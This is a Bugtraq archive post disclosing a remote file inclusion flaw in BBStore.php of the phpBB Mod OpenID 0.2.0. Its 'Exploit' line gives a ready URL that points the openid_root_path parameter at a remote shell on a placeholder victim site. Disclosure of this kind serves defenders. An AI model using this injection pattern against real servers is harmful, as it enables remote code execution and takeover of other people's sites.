Bugtraq mailing list archives

phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion

From: h3llcode () hotmail it
Date: 30 Sep 2007 22:50:47 -0000

+++++++++++++++++++++++++++++++++++++++++++++++++++
+
+ phpBB Mod OpenID 0.2.0 BBStore.php RFI
+ Risk: High
+ Found by Seph1roth
+ Site: http://blackroots.it
+
+++++++++++++++++++++++++++++++++++++++++++++++++++

+ Vulnerable Script Download: http://sourceforge.net/project/showfiles.php?group_id=178846

+ Exploit:
http://www.victim.it/path/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=[Shell]

Current thread:

phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion h3llcode (Oct 01)
- Re: phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion str0ke (Oct 01)